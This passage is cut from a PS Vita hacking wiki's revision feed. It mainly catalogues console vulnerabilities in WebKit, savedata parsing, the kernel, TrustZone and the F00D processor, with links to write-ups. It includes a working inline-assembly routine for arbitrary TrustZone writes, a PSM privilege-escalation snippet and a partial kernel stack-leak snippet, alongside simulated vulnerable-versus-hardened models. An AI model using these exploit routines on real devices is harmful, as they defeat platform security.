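    printf("checked copy with len=(size_t)-16 accepted: %d\n", demo_checked_copy((size_t)-16));
    return 0;
}
```
<br />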
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution, the eMMC MBR can be modified to change the block size. However, at the time yifan was trying to exploit it with an adjacent malloc (controlled_size) and couldn't find a way, so he left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyz finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL: a function does not check an error return, and if it did, the value corrupted by the buffer overflow would not have been used. Later on, the field that was overwritten is used in a separate call.<br />
<br />
This allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
An imports/exports list for the 1.80 TrustZone modules is available at [[File:Psvita_1.80_tz_nids.txt]].<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and have the SMC copy this data somewhere into TrustZone memory (e.g. the SMC table). This results in TrustZone-level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
#include <stdint.h><br />
#include <string.h><br />
<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
    /* Stage the 8 bytes at non-secure 0x00400028, which TrustZone sees at 0x00560028 */<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    /* sm_handle = tz_addr >> 1, so the SMC reads its 8 bytes from 0x00560000 + 0x28 */<br />
    uintptr_t sm_handle = 0x00560000 >> 1;<br />
    /* shared_mem_index selects where the bytes land: 0x00560000 + index * 0x80 */<br />
    uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
    asm volatile(<br />
        "mov r0, %0\n\t"<br />
        "mov r1, %1\n\t"<br />
        "mov r12, #0x12F\n\t"<br />
        "smc #0\n\t"<br />
        : : "r"(sm_handle), "r"(shared_mem_index) : "r12"<br />
    );<br />
}<br />
</source><br />
<br />
To achieve code execution, dst must be set to the SMC table address in order to plant two pointers (8 = 2 * 4 bytes).<br />
<br />
Patched somewhere after 1.80 and before 2.10.<br />
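<br />
The two checks that SMC 0x12F lacked, shown side by side with the unchecked behaviour in a simulated secure-world address space. This is an added example, not Sony's TrustZone code: the shared memory address (0x00560000), its 0x5000-byte size and the 0x80-byte slots are the page's values, while the modelled TZ RAM range, the location of the SM handle table (SM_TABLE_BASE) and the error codes are assumptions.<br />
<br />
```c
#include <stdint.h>
#include <string.h>

/* Constructed model of SMC 0x12F argument handling. Not Sony's code. */
#define TZ_BASE       0x00500000u   /* assumed: start of modelled TZ RAM      */
#define TZ_SIZE       0x00080000u   /* assumed: 512 KiB of modelled TZ RAM    */
#define SHARED_BASE   0x00560000u   /* secure-world view of the shared region */
#define SHARED_SIZE   0x00005000u   /* size given on the page                 */
#define SLOT_SIZE     0x80u
#define SLOT_COUNT    (SHARED_SIZE / SLOT_SIZE)   /* 0xA0 valid indices        */
#define SM_TABLE_BASE 0x00520000u   /* assumed: where valid SM handles live   */
#define SM_TABLE_SIZE 0x00001000u
#define LEAK_OFFSET   0x28u         /* handler reads 8 bytes at tz_addr+0x28  */

static uint8_t tz_mem[TZ_SIZE];     /* simulated secure-world RAM */

static uint8_t *tz_ptr(uint32_t addr) { return tz_mem + (addr - TZ_BASE); }

/* True when [addr, addr+len) lies inside the modelled TZ RAM. Only a guard
 * for the simulation; the unchecked handler has no such check. */
static int in_tz_mem(uint32_t addr, uint32_t len)
{
    return addr >= TZ_BASE && addr - TZ_BASE + len <= TZ_SIZE;
}

/* Write constructed bytes into simulated TZ RAM (test fixture helper). */
int tz_poke(uint32_t addr, const uint8_t *data, uint32_t len)
{
    if (!in_tz_mem(addr, len))
        return -1;
    memcpy(tz_ptr(addr), data, len);
    return 0;
}

/* Read one byte of simulated TZ RAM (0 when outside the model). */
uint8_t tz_read8(uint32_t addr)
{
    return in_tz_mem(addr, 1) ? *tz_ptr(addr) : 0;
}

/* Index value that maps the slot write to a given TZ address; this is the
 * (shared_mem_blk_addr - shared_mem_base_addr) / 0x80 formula from the page. */
uint32_t index_for_target(uint32_t target)
{
    return (target - SHARED_BASE) / SLOT_SIZE;
}

/* Vulnerable behaviour: both arguments are trusted. Returns the address
 * that received the 8 copied bytes, or 0 if the simulation cannot model it. */
uint32_t smc_12f_unchecked(uint32_t sm_handle, uint32_t shared_mem_index)
{
    uint32_t src = (sm_handle << 1) + LEAK_OFFSET;
    uint32_t dst = SHARED_BASE + shared_mem_index * SLOT_SIZE;
    if (!in_tz_mem(src, 8) || !in_tz_mem(dst, 8))
        return 0;                           /* simulation guard only */
    memcpy(tz_ptr(dst), tz_ptr(src), 8);    /* lands anywhere in TZ */
    return dst;
}

/* Hardened behaviour: the handle must point into the SM handle table and the
 * index must select one of the SLOT_COUNT slots of the shared region. */
int smc_12f_checked(uint32_t sm_handle, uint32_t shared_mem_index)
{
    uint32_t tz_addr = sm_handle << 1;
    if (tz_addr < SM_TABLE_BASE ||
        tz_addr - SM_TABLE_BASE + LEAK_OFFSET + 8 > SM_TABLE_SIZE)
        return -1;                          /* sm_handle outside the table */
    if (shared_mem_index >= SLOT_COUNT)
        return -2;                          /* index escapes the 0x5000 region */
    memcpy(tz_ptr(SHARED_BASE + shared_mem_index * SLOT_SIZE),
           tz_ptr(tz_addr + LEAK_OFFSET), 8);
    return 0;
}
```
<br />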
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via brute force.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Boot ROM ===<br />
<br />
(2019-08-30) To be disclosed.<br />
<br />
== F00D Processor ==<br />
<br />
=== octopus exploit ===<br />
(2017-02-18) F00D secure_kernel module loading does not check the source address and therefore provides an oracle allowing a memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
=== Heap buffer overflow in update_service_sm ===<br />
<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
Not patched yet (not sure).<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code>, which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory), and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however, cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to reuse the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault into either the decoding or the execution unit of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as an F00D exception handler table whose entries all point to our payload, we can execute F00D code at bootrom time (before the bootrom is unmapped). This is a very desirable glitching target because it requires almost no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at most 1 eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC which is loaded from the [[SLB2]] partition by ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=File:Psvita_1.80_tz_nids.txt&diff=11478File:Psvita 1.80 tz nids.txt2019-08-31T15:41:11Z<p>Xyz: </p>
<hr />
<div></div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=MediaWiki:Common.css&diff=11477MediaWiki:Common.css2019-08-31T15:39:22Z<p>Xyz: </p>
<hr />
<div>/* CSS placed here will be applied to all skins */<br />
/* Default style for navigation boxes */<br />
.navbox { /* Navbox container style */<br />
border: 1px solid #aaa;<br />
width: 100%;<br />
margin: auto;<br />
clear: both;<br />
font-size: 88%;<br />
text-align: center;<br />
padding: 1px;<br />
}<br />
.navbox-inner,<br />
.navbox-subgroup {<br />
width: 100%;<br />
}<br />
.navbox-group,<br />
.navbox-title,<br />
.navbox-abovebelow {<br />
padding: 0.25em 1em; /* Title, group and above/below styles */<br />
line-height: 1.5em;<br />
text-align: center;<br />
}<br />
th.navbox-group { /* Group style */<br />
white-space: nowrap;<br />
/* @noflip */<br />
text-align: right;<br />
}<br />
.navbox,<br />
.navbox-subgroup {<br />
background: #fdfdfd; /* Background color */<br />
}<br />
.navbox-list {<br />
line-height: 1.8em;<br />
border-color: #fdfdfd; /* Must match background color */<br />
}<br />
.navbox th,<br />
.navbox-title {<br />
background: #ccccff; /* Level 1 color */<br />
}<br />
.navbox-abovebelow,<br />
th.navbox-group,<br />
.navbox-subgroup .navbox-title {<br />
background: #ddddff; /* Level 2 color */<br />
}<br />
.navbox-subgroup .navbox-group,<br />
.navbox-subgroup .navbox-abovebelow {<br />
background: #e6e6ff; /* Level 3 color */<br />
}<br />
.navbox-even {<br />
background: #f7f7f7; /* Even row striping */<br />
}<br />
.navbox-odd {<br />
background: transparent; /* Odd row striping */<br />
}<br />
table.navbox + table.navbox { /* Single pixel border between adjacent navboxes */<br />
margin-top: -1px; /* (doesn't work for IE6, but that's okay) */<br />
}<br />
.navbox .hlist td dl,<br />
.navbox .hlist td ol,<br />
.navbox .hlist td ul,<br />
.navbox td.hlist dl,<br />
.navbox td.hlist ol,<br />
.navbox td.hlist ul {<br />
padding: 0.125em 0; /* Adjust hlist padding in navboxes */<br />
}<br />
ol + table.navbox,<br />
ul + table.navbox {<br />
margin-top: 0.5em; /* Prevent lists from clinging to navboxes */<br />
}<br />
<br />
/* Default styling for Navbar template */<br />
.navbar {<br />
display: inline;<br />
font-size: 88%;<br />
font-weight: normal;<br />
}<br />
.navbar ul {<br />
display: inline;<br />
white-space: nowrap;<br />
}<br />
.navbar li {<br />
word-spacing: -0.125em;<br />
}<br />
.navbar.mini li span {<br />
font-variant: small-caps;<br />
}<br />
/* Navbar styling when nested in infobox and navbox */<br />
.infobox .navbar {<br />
font-size: 100%;<br />
}<br />
.navbox .navbar {<br />
display: block;<br />
font-size: 100%;<br />
}<br />
.navbox-title .navbar {<br />
/* @noflip */<br />
float: left;<br />
/* @noflip */<br />
text-align: left;<br />
/* @noflip */<br />
margin-right: 0.5em;<br />
width: 6em;<br />
}<br />
<br />
/* 'show'/'hide' buttons created dynamically by the CollapsibleTables javascript<br />
in [[MediaWiki:Common.js]] are styled here so they can be customised. */<br />
.collapseButton {<br />
/* @noflip */<br />
float: right;<br />
font-weight: normal;<br />
/* @noflip */<br />
margin-left: 0.5em;<br />
/* @noflip */<br />
text-align: right;<br />
width: auto;<br />
}<br />
/* In navboxes, the show/hide button balances the v·d·e links<br />
from [[Template:Navbar]], so they need to be the same width. */<br />
.navbox .collapseButton {<br />
width: 6em;<br />
}<br />
<br />
/* Styling for JQuery makeCollapsible, matching that of collapseButton */<br />
.mw-collapsible-toggle {<br />
font-weight: normal;<br />
/* @noflip */<br />
text-align: right;<br />
}<br />
.navbox .mw-collapsible-toggle {<br />
width: 6em;<br />
}<br />
<br />
pre code {<br />
border: none;<br />
}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11476Vulnerabilities2019-08-31T01:42:47Z<p>Xyz: /* Hardware */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz so that HENkaku could be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577,<ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using NaN as the argument.<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many people. Patched on FW 3.30.<br />
<br />
The heap buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, the trailing array items are written outside the "m_storage->m_vector[]" buffer, which leads to heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.50-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (Vita FW 3.30-3.71) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next kernel exploit, named 2050 and 2051.<br />
<br />
Working on <= 3.71. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevertheless, a set of tricks allows installing and using PSM on any PSVita on FW <= 3.51.<br />
<br />
PSM apps can't work on FW >= 3.52 because they are blacklisted in the PSVita OS. This can be bypassed only with a kernel exploit and the ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can therefore be installed using PKG Installer or the BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
The PSM developer license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (it can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource-based hack just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
    public class AppMain<br />
    {<br />
        [SecurityCritical]<br />
        public static void Escalate (IAsyncResult result)<br />
        {<br />
            Console.WriteLine("Should be SecurityCritical");<br />
            IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
            Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
        }<br />
<br />
        public static void Main (string[] args)<br />
        {<br />
            Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
            Network.AuthGetTicket();<br />
            NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
            IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
            while (!result.IsCompleted)<br />
            {<br />
                Console.WriteLine("waiting...");<br />
            }<br />
            Console.WriteLine("Completed!");<br />
        }<br />
    }<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFlow. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly so).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
h-encore uses a different entry point than its predecessor HENkaku. Instead of a WebKit exploit, it uses a gamesave exploit. The reason is that after firmware 3.30 or so, Sony introduced [[SceKernelModulemgr#sceKernelInhibitLoadingModule|sceKernelInhibitLoadingModule]]() in their browser, which prevented us from loading additional sysmodules. This limitation is crucial, since loading sysmodules was the only way we could get more syscalls (than the browser uses): syscall numbers are randomized at boot and only assigned to syscall slots if some user module imports them. h-encore needs to load SceNgsUser, a sysmodule vulnerable to kexploits.<br />
<br />
==== Old games do not have ASLR ====<br />
<br />
The reason why a gamesave exploit is possible on such a system is that games developed with SDK 2.60 or lower were compiled as statically linked executables, so their load address is always the same, namely 0x81000000, and they cannot be relocated to another region. They also don't have stack protection enabled by default, which means that if we can smash the stack in such a game, we can happily do ROP.<br />
<br />
==== Method for finding a savedata bug ====<br />
<br />
Looking for gamesave exploits is a boring process: you just fuzz gamesaves by writing random stuff at random locations until you get a crash (the best bet is extending strings and hoping that you can smash the stack).<br />
<br />
==== Bittersmile game buffer overflow (h-encore) ====<br />
<br />
The Bittersmile game was found exploitable on 2018-02-17 by Freakler. Implemented in h-encore by TheFloW.<br />
<br />
The bug lies in the parser of the Bittersmile game. The gamesave is actually a text file; the game reads it line by line and copies each line to a list of buffers. However, it doesn't validate the length, so if we put the delimiter \n far enough away that the line is longer than the buffer can hold, we get a classic buffer overflow.<br />
If this buffer were on the stack, we could overwrite the return address and directly execute our ROP chain. However, it is in the data section; luckily for us, the content after the buffer is the list containing the destinations for the other lines. This means that if we overflow into the list and redirect the buffer, we can copy the next line wherever we want, which gives us an arbitrary write primitive.<br />
<br />
Not patchable. The Bittersmile game requires a minimum FW of ?2.50? to run.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#buffer-overflow h-encore writeup by TheFloW]<br />
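<br />
A constructed model of the save parser pattern described above, with the unchecked line copy next to a bounded one. This is an added example, not the game's code: the real layout is not on the page, so the 16-byte line buffer, the 4-entry destination table that follows it and the flat "data section" byte array are assumptions.<br />
<br />
```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Assumed layout: a line buffer immediately followed by the table of
 * destination addresses for later lines, both inside one data section. */
#define LINE_BUF_SIZE 16
#define DEST_COUNT    4
#define DATA_SIZE     (LINE_BUF_SIZE + DEST_COUNT * 4)

struct data_section {
    uint8_t raw[DATA_SIZE];     /* [0,16) line buffer, [16,32) dest table */
};

/* Destination entry i, read back as a 32-bit value (host byte order). */
uint32_t dest_entry(const struct data_section *d, int i)
{
    uint32_t v;
    memcpy(&v, d->raw + LINE_BUF_SIZE + i * 4, 4);
    return v;
}

/* Fill the section with constructed destination addresses. */
static void init_section(struct data_section *d)
{
    memset(d->raw, 0, DATA_SIZE);
    for (int i = 0; i < DEST_COUNT; i++) {
        uint32_t addr = 0x81100000u + (uint32_t)i * 0x100;   /* constructed */
        memcpy(d->raw + LINE_BUF_SIZE + i * 4, &addr, 4);
    }
}

/* Vulnerable: copies until '\n' with no length check, as the page describes.
 * Returns the number of bytes written; anything beyond LINE_BUF_SIZE has
 * landed in the destination table. Capped at DATA_SIZE only so that the
 * model itself stays within defined behaviour. */
size_t read_line_unchecked(struct data_section *d, const char *save)
{
    size_t n = 0;
    while (save[n] != '\n' && save[n] != '\0' && n < DATA_SIZE) {
        d->raw[n] = (uint8_t)save[n];
        n++;
    }
    return n;
}

/* Hardened: stops at the buffer bound and reports the malformed line. */
int read_line_checked(struct data_section *d, const char *save)
{
    size_t n = 0;
    while (save[n] != '\n' && save[n] != '\0') {
        if (n == LINE_BUF_SIZE - 1)
            return -1;            /* line too long: reject the save */
        d->raw[n] = (uint8_t)save[n];
        n++;
    }
    d->raw[n] = '\0';
    return (int)n;
}

/* Parse one constructed line with either parser, then return dest[0] so the
 * caller can see whether the table survived intact. */
uint32_t first_dest_after(const char *save, int hardened)
{
    struct data_section d;
    init_section(&d);
    if (hardened)
        read_line_checked(&d, save);
    else
        read_line_unchecked(&d, save);
    return dest_entry(&d, 0);
}

/* The hardened parser's verdict on one line: its length, or -1 if rejected. */
int line_status(const char *save)
{
    struct data_section d;
    init_section(&d);
    return read_line_checked(&d, save);
}
```
<br />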
<br />
=== PSP Emulator escape ===<br />
<br />
See [https://theofficialflow.github.io/2019/06/18/trinity.html#psp-emulator-escape Trinity writeup by TheFloW].<br />
<br />
==== Why hack the PSP Emulator? Why not WebKit/games? ====<br />
<br />
The PSP Emulator runs at system privileges which are equivalent to root. By gaining control over the emulator, we are exposed to almost ALL syscalls, unlike the WebKit process that is sandboxed. Similarly, the previous jailbreak h-encore exploited a gamesave vulnerability such that it could invoke the NGS syscalls.<br />
<br />
==== Buffer overflow in ScePspemuRemoteNet-KERMIT_CMD_ADHOC_CREATE ====<br />
<br />
Discovered on 2018-05-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-smash writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
==== CSC doesn't sanity check the row number (arbitrary userland memory read) ====<br />
<br />
Discovered on 2018-06-04 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#csc-arbitrary-read writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== System ==<br />
<br />
=== PSVita can use PSP/PS3 PSStore licenses ===<br />
<br />
PSVita can use .rif downloaded from PSVita, PSP, or PS3 (ReStore by CelesteBlue).<br />
<br />
PSVita can use PSP or PS3 act.dat if we spoof ConsoleId (idps) and OpenPSID (ReNpDrm by CelesteBlue).<br />
<br />
This means that however much Sony secures the PSVita store, we will always be able to activate as long as the PS3 store is not secure.<br />
<br />
=== PSStore Activation server does not check challenge anymore ===<br />
<br />
Since May 2018, the challenge string in requests sent from PSVita to PSN for Content and PSN Account activations is not checked anymore server-side.<br />
<br />
This means that to activate a PSVita, we only have to spoof the firmware version to bypass the FW Update popup, and spoof a recent PSN passcode key in SceShell. Both are done by taiHEN (in henkaku.suprx). This also means ReStore and ReNpDrm are not needed anymore.<br />
<br />
== Kernel ==<br />
<br />
=== Syscall handler doesn't check syscall number (integer overflow) ===<br />
<br />
Discovered on 2015-07-03 by Molecule Team.<br />
<br />
A large syscall number passed in R12 can index past the end of the syscall table and cause an arbitrary function pointer to be dereferenced and executed.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== syscall handler leaks syscall table vaddr ===<br />
<br />
When a syscall is invoked with an invalid syscall id, the svc interrupt handler ends without clearing the syscall table vaddr left in r0.<br />
<br />
Tested on 1.50. Patched on 1.61.<br />
<br />
=== Stack buffer overflow in sceSblDmac5EncDec ===<br />
<br />
Discovered on 2014-09-16 by Molecule Team. Implemented in xyz's 1.61 exploit chain in 2016, then in CelesteBlue's QuickHEN_PSVITA.<br />
<br />
[[SceSblSsMgr#sceSblDmac5EncDec|SceSblDmac5Mgr_sceSblDmac5EncDec]]<br />
<br />
<pre><br />
This function:<br />
reads in 0x18 bytes from first arg<br />
processes a little<br />
then:<br />
ROM:005F711A MOV R1, R11<br />
ROM:005F711C ADD R0, SP, #0x88+var_70<br />
ROM:005F711E MOV.W R2, R10,LSR#3<br />
ROM:005F7122 BLX _import_SceSblSsMgr_SceSysmemForDriver_sceKernelMemcpyUserToKernelForDriver<br />
R10 comes from original read in buffer+0x10<br />
</pre><br />
<br />
Tested on 1.61. Patched on 1.80. They also added an IsShell check.<br />
<br />
=== Kernel stack leak in sceIoDevctl ===<br />
<br />
Discovered on 2014-11-24 by Molecule Team. Used in HENkaku by Molecule Team.<br />
<br />
Tested successfully on firmware 0.995 in fself. Since at least firmware 1.030, it works only via webkit (not fself nor games but maybe ePSP or PSM) exploits.<br />
<br />
Call some functions that interest you in a kernel context (call some damn syscalls, for example sceIoOpen).<br />
Then call sceIoDevctl and get up to 0x3FF bytes of that stack!<br />
<br />
<source lang="C"><br />
// make a buffer, tagged with '0x66' bytes<br />
char outbuf[0x400];<br />
memset(outbuf, 0x66, 0x400);<br />
<br />
sceIoOpen("molecule0:", 0, 0); // populate kernel stack<br />
<br />
